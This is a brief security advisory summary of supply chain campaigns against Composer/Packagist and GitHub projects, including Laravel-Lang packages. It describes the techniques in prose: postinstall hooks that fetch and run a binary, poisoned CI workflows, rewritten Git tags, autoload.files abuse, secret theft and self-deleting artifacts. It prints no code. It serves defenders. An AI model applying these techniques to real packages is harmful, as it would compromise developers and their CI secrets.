Researchers identified multiple coordinated software supply chain attacks targeting Composer/Packagist packages and upstream GitHub repositories. The activity involved malicious postinstall hooks, compromised Git tags, CI/CD payload execution, and credential-stealing malware designed to exfiltrate secrets from developer systems and CI environments. The campaigns impacted Laravel-related packages as well as additional PHP and Node.js repositories, with malicious code delivered through package installation workflows, Composer autoload behavior, and GitHub Actions pipelines.
Researchers from Socket identified a large-scale campaign affecting more than 700 GitHub repositories and multiple Packagist packages. The attackers inserted malicious postinstall hooks into package.json files that downloaded a remote binary from attacker-controlled GitHub infrastructure, wrote it to /tmp/.sshd, marked it executable, and launched it in the background. Additional investigation revealed the same payload embedded inside GitHub Actions workflow files, indicating attempts to compromise CI/CD execution paths in addition to local developer environments. The campaign primarily targeted projects combining PHP and JavaScript tooling, exploiting the likelihood that defenders would inspect composer.json while overlooking bundled Node.js lifecycle hooks.
Separately, researchers from StepSecurity reported that an attacker with push access to the Laravel-Lang GitHub organization force-rewrote every Git tag across several highly popular Composer packages, including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/actions, and laravel-lang/attributes. The malicious commits modified Composer autoload behavior by adding a src/helpers.php file to the autoload.files section, causing the payload to execute automatically whenever vendor/autoload.php was loaded. The malware fetched additional payloads from a typosquatted domain, exfiltrated CI secrets and environment variables, spawned orphaned processes to evade detection, and removed artifacts from disk within seconds to hinder forensic analysis.